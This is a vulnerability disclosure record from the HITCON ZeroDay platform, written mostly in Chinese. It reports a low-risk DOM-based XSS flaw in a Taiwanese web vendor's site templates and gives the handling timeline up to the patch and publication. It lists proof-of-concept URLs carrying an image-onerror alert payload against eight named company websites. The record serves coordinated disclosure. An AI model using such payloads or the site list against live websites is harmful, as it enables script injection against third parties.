Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2025-00059
- Vendor: 大可設計軟體科技有限公司
- Title: 大可設計軟體科技有限公司產品存在XSS
- Introduction: XSS
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
已修補
-
已複測
-
公開
處理歷程
- 2025/01/10 13:11:00 : 新提交 (由 普普通通的小名 更新此狀態)
- 2025/01/10 13:48:51 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/01/17 17:21:55 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/01/17 17:21:56 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/02/07 15:38:44 : 複測申請中 (由 組織帳號 更新此狀態)
- 2025/02/10 11:51:24 : 確認已修補 (由 普普通通的小名 更新此狀態)
- 2025/02/14 03:06:03 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2025-00059
- 通報者:W_NICK_W (普普通通的小名)
- 風險:低
- 類型:基於 DOM 的 XSS (DOM-based Cross-Site Scripting)
參考資料
漏洞說明: OWASP - Cross-site Scripting (XSS)
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
防護原則:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
XSS 防禦繞過方式:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
相關網址
http://www.yicheng-tn.com.tw/search_page.php
https://www.nt-movie.com.tw/search_movie.php
https://www.tunggwo.com.tw/search.php?SrchTxt=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E
http://www.baoshiang.com.tw/search.php?SrchTxt=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E
https://www.suntech-seed.com.tw/search.php?SrchTxt=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E
http://www.shin-li.com.tw/product_search.php?SrchTxt=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E
http://www.hengda.com.tw/product_search.php?SrchTxt=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E
https://www.astone-helmets.com.tw/p_search.php?SrchTxt=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E
敘述
一成餐具
http://www.yicheng-tn.com.tw/search_page.php
南台影城
https://www.nt-movie.com.tw/search_movie.php
通國防護裝備股份有限公司
https://www.tunggwo.com.tw/search.php?SrchTxt=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E
寶祥塑膠工業有限公司
http://www.baoshiang.com.tw/search.php?SrchTxt=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E
稼穡種子有限公司
https://www.suntech-seed.com.tw/search.php?SrchTxt=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E
信俐國際股份有限公司
http://www.shin-li.com.tw/product_search.php?SrchTxt=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E
恆大實業官方網站
http://www.hengda.com.tw/product_search.php?SrchTxt=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E
亮宇貿易股份有限公司
https://www.astone-helmets.com.tw/p_search.php?SrchTxt=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E
payload都為"><img src=x onerror=alert(1)>
觀察URL不確定是2個還是3個模板都有XSS